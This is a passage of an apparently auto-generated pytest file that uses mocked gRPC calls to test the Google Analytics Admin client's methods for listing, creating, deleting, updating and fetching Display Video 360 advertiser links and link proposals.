call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], ), RuntimeError, ) pages = list(client.list_display_video360_advertiser_links(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_display_video360_advertiser_links_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], ), RuntimeError, ) async_pager = await client.list_display_video360_advertiser_links(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all( isinstance(i, resources.DisplayVideo360AdvertiserLink) for i in responses ) @pytest.mark.asyncio async def test_list_display_video360_advertiser_links_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], ), RuntimeError, ) pages = [] async for page_ in ( await client.list_display_video360_advertiser_links(request={}) ).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_create_display_video360_advertiser_link( transport: str = "grpc", request_type=analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", ) response = client.create_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLink) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" def test_create_display_video360_advertiser_link_from_dict(): test_create_display_video360_advertiser_link(request_type=dict) def test_create_display_video360_advertiser_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: client.create_display_video360_advertiser_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest() @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", ) ) response = await client.create_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLink) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_async_from_dict(): await test_create_display_video360_advertiser_link_async(request_type=dict) def test_create_display_video360_advertiser_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: call.return_value = resources.DisplayVideo360AdvertiserLink() client.create_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink() ) await client.create_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_display_video360_advertiser_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_display_video360_advertiser_link( parent="parent_value", display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), ) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[ 0 ].display_video_360_advertiser_link == resources.DisplayVideo360AdvertiserLink( name="name_value" ) def test_create_display_video360_advertiser_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_display_video360_advertiser_link( analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest(), parent="parent_value", display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), ) @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_display_video360_advertiser_link( parent="parent_value", display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), ) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[ 0 ].display_video_360_advertiser_link == resources.DisplayVideo360AdvertiserLink( name="name_value" ) @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_display_video360_advertiser_link( analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest(), parent="parent_value", display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), ) def test_delete_display_video360_advertiser_link( transport: str = "grpc", request_type=analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. 
assert response is None def test_delete_display_video360_advertiser_link_from_dict(): test_delete_display_video360_advertiser_link(request_type=dict) def test_delete_display_video360_advertiser_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: client.delete_display_video360_advertiser_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest() @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. 
assert response is None @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_async_from_dict(): await test_delete_display_video360_advertiser_link_async(request_type=dict) def test_delete_display_video360_advertiser_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: call.return_value = None client.delete_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_display_video360_advertiser_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_display_video360_advertiser_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_display_video360_advertiser_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_display_video360_advertiser_link( analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_display_video360_advertiser_link( name="name_value", ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_display_video360_advertiser_link( analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest(), name="name_value", ) def test_update_display_video360_advertiser_link( transport: str = "grpc", request_type=analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", ) response = client.update_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLink) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" def test_update_display_video360_advertiser_link_from_dict(): test_update_display_video360_advertiser_link(request_type=dict) def test_update_display_video360_advertiser_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: client.update_display_video360_advertiser_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest() @pytest.mark.asyncio async def test_update_display_video360_advertiser_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", ) ) response = await client.update_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLink) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" @pytest.mark.asyncio async def test_update_display_video360_advertiser_link_async_from_dict(): await test_update_display_video360_advertiser_link_async(request_type=dict) def test_update_display_video360_advertiser_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest() request.display_video_360_advertiser_link.name = ( "display_video_360_advertiser_link.name/value" ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: call.return_value = resources.DisplayVideo360AdvertiserLink() client.update_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "display_video_360_advertiser_link.name=display_video_360_advertiser_link.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_display_video360_advertiser_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest() request.display_video_360_advertiser_link.name = ( "display_video_360_advertiser_link.name/value" ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink() ) await client.update_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "display_video_360_advertiser_link.name=display_video_360_advertiser_link.name/value", ) in kw["metadata"] def test_update_display_video360_advertiser_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. 
client.update_display_video360_advertiser_link( display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[ 0 ].display_video_360_advertiser_link == resources.DisplayVideo360AdvertiserLink( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_display_video360_advertiser_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_display_video360_advertiser_link( analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest(), display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_display_video360_advertiser_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. 
response = await client.update_display_video360_advertiser_link( display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[ 0 ].display_video_360_advertiser_link == resources.DisplayVideo360AdvertiserLink( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_display_video360_advertiser_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_display_video360_advertiser_link( analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest(), display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_get_display_video360_advertiser_link_proposal( transport: str = "grpc", request_type=analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = resources.DisplayVideo360AdvertiserLinkProposal( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", validation_email="validation_email_value", ) response = client.get_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" assert response.validation_email == "validation_email_value" def test_get_display_video360_advertiser_link_proposal_from_dict(): test_get_display_video360_advertiser_link_proposal(request_type=dict) def test_get_display_video360_advertiser_link_proposal_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: client.get_display_video360_advertiser_link_proposal() call.assert_called() _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest() ) @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_proposal_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLinkProposal( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", validation_email="validation_email_value", ) ) response = await client.get_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. 
assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" assert response.validation_email == "validation_email_value" @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_proposal_async_from_dict(): await test_get_display_video360_advertiser_link_proposal_async(request_type=dict) def test_get_display_video360_advertiser_link_proposal_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: call.return_value = resources.DisplayVideo360AdvertiserLinkProposal() client.get_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_proposal_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLinkProposal() ) await client.get_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_display_video360_advertiser_link_proposal_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLinkProposal() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_display_video360_advertiser_link_proposal(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_display_video360_advertiser_link_proposal_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
